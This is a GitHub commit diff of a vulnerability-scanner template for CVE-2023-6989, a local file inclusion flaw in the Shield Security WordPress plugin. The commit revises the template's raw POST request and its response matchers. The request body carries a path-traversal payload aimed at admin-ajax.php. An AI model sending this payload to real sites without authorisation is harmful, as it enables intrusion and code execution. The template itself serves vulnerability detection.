updated macthers

patch-2
Ritik Chaddha 2024-05-07 17:19:33 +05:30 committed by GitHub
parent 323bb95b6a
commit 1971ae94e6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 21 additions and 22 deletions

View File

@ -7,8 +7,8 @@ info:
description: |
The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
reference:
- https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6989
- https://www.cvedetails.com/cve/CVE-2023-6989/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -18,39 +18,38 @@ info:
epss-percentile: 0.68187
cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: getshieldsecurity
product: shield_security
framework: wordpress
tags: cve,cve2023,wp,wordpress,wp-plugin,lfi
publicwww-query: "/wp-content/plugins/wp-simple-firewall"
tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: "*/*"
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
body: |
action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php
action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"dashboard_shield"'
- '"shield_action"'
- '"search_shield"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200